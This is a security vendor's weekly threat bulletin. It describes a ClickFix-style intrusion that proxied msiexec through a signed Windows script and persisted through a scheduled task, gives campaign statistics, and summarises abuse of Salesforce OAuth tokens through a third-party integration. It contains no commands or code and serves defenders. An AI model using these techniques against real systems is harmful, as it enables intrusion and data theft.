Blackpoint SOC Threat Pulse: Week of June 22, 2026

In this week’s Threat Pulse, discover how attackers used a legitimate Windows script to hide in plain sight, and how the Blackpoint Security Operations Center (SOC) isolated the incident. The Adversary Pursuit Group (APG) shares their quick take on SaaS integration abuse and why it’s occurring within cloud and application layers.

Featured Incident: Fast Track to UltraFinder 

What we’re seeing 

• The Blackpoint SOC alerted to suspicious msiexec.exe usage by a user; further investigation determined initial access was likely a ClickFix-style attack.  

• The malicious execution proxied through the legitimate system script SyncAppvPublishingServer.vbs in an attempt to evade detection. 

• The execution sourced from a scheduled task, designed to rerun the beacon command and ensure a consistent method of persistence 

• The command in question utilized msiexec.exe to retrieve and execute a second stage payload from remotely hosted attacker infrastructure, determined to be UltraFinder, a tool used to find files on the system.  

What the Blackpoint SOC did 

• The Blackpoint SOC isolated the impacted host to prevent further access and malicious activity.  

• The Blackpoint SOC conducted further investigation to identify potential lateral movement or other activity, finding none.  

Why this matters 

• Without quick intervention, this could have led to a higher impact compromise, including data theft, malware deployment, and widespread access.  

• ClickFix-style attacks have continued to increase as threat actors turn to convincing social engineering tactics for initial access. 

BROC Weekly Snapshot 

What changed. What didn’t. What matters. 

Incidents Observed  >95↓

Pre-Payload Disruptions  93%↑

Pre-Ransom Interruptions  2%↑

Campaign Statuses 

Fake CAPTCHA/ClickFix	↑	Escalating	47%
Rogue RMM	↓	Ongoing	12%
SSL VPN Compromise	↓	Ongoing	7%
Trojanized Installers	↓	Ongoing	2%

Quick Take 

The Blackpoint APG is actively tracking a series of breaches against Salesforce customers, with the latest being attributed to Icarus, an emerging extortion group identified in April 2026. The threat actors reportedly abused a third-party application integration through Klue’s Battlecards application and gained access to Salesforce instances using Klue OAuth tokens.  

The threat group then exfiltrated sensitive data; however, the overall scope of the data access and exfiltration is still under investigation. Additionally, the group maintains a data leak site used to add pressure to targeted victims. This incident follows a pattern that has been established by other threat groups, including ShinyHunters and UNC6395, reported to target Salesforce instances throughout 2025 and into 2026.  

The recurring compromise of Salesforce-connected applications highlights a broader shift toward SaaS integration abuse, where attackers leverage trusted OAuth relationships to access business-critical data without requiring endpoint execution or traditional malware deployment. These attacks often occur entirely within cloud and application layers, reducing the visibility available to security teams that primarily monitor endpoints and network activity.